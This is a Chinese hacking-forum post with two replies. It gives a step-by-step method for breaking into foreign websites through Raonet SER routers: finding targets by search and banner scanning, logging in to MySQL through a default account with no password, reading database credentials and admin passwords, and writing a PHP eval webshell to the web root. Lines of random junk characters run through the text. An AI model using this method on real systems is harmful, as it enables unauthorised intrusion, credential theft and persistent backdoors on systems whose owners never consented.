中国网络渗透测试联盟

标题: 利用某路由器漏洞入侵国外站点 [打印本页]

作者: admin    时间: 2012-12-10 10:30
标题: 利用某路由器漏洞入侵国外站点
  寻找存在漏洞的路由器方法:
5 V8 @5 B4 ~, ~& I0 B8 [2 y* W: y' q; T- ?7 b
1:google搜索'Raonet Subscriber Ethernet Router'
  z1 }: M- \! K% w$ }. r! {
" H1 f+ j! I1 x/ k2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20010 k, D+ h8 r- f9 U9 i
( t* W* |. x" Z' h
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
# a$ V& k9 l0 i* R( p, Q# L' `. v  f" B, O) T3 R
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
1 ]  O  K& G% g6 z2 x6 R4 ~
( J; x, o- `7 g( S " l7 i$ O4 e1 E9 U7 O
7 y/ V) v# r9 j4 x% p6 z4 }
入侵步骤:- T/ ^0 L( W! X2 Y* }

/ X; |$ P7 g* N( @' }) n2 ~  _! {1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php. a& i  v- J+ M7 n' Z+ s4 Q

- ?( j- ?# ]8 A2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
( J9 ^/ o. O, R3:得到密码后连接,查看GUI管理密码:7 K' m, S4 k! I' [
use ser_500/ G5 z  }9 o2 I/ A
select id,passwd from user;! P& T& m" e7 V: F4 V8 C+ q3 V
4:通过数据库写入webshell,执行命令:: `7 l* J- i( c. Q
use mysql;# M# j( Q$ q% `, r0 d
create table ok(cmd TEXT);
9 @9 m0 q* X; f& ninsert into ok values("<?php @eval($_POST[cmd])?>");
: K+ C( B& _3 q! z. a6 aselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
( \- W* w& m* E3 b9 L- t' Kdrop table ok;
% Y: }- ~  M4 p; ^! V! j* X
+ @) e) k9 H4 A* Y! w% e5 @5:连接后门shell.php : N  _" y" [" p8 @; U: ]; W% a
( u: E% J+ l. D% A
6. 搞定!7 r- g: e% G% \9 p4 |# I! C8 g
* |. I# f( Z% o; r% ?* k

作者: Anthony~    时间: 2013-7-27 20:06
这个后果可以很严重的说
作者: jos666    时间: 2013-7-29 12:07
不错哦,黑服务器补洞。。




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2